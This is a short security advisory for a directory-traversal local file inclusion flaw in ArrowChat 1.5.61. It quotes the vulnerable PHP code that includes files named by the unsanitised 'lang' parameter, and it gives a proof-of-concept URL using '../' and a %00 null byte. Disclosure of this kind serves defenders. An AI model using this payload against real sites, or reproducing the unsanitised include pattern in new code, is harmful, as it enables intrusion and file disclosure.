ArrowChat External.php Lang Parameter Traversal Local File Inclusion Exploit
Summary
Credit:
The information has been provided by kallimero.
Details
Vulnerable Systems:
* ArrowChat 1.5.61
ArrowChat contains a flaw that allows an attacker to traverse outside of a restricted path. The issue is due to the external.php script not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the ‘lang’ parameter. This directory traversal attack would allow a local attacker to include arbitrary files.
// Load another language if lang GET value is set and exists
if (var_check(‘lang’))
{
$lang = get_var(‘lang’);
if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ‘.php’))
{
include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ‘.php’);
}
}
—————[index.php]—————
Thanks to the nullbyte tricks we’ll be able to include any php file, like
that :
http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs
Disclosure Timeline:
Disclosure Date :2013-02-02
Exploit Publish Date :2013-02-02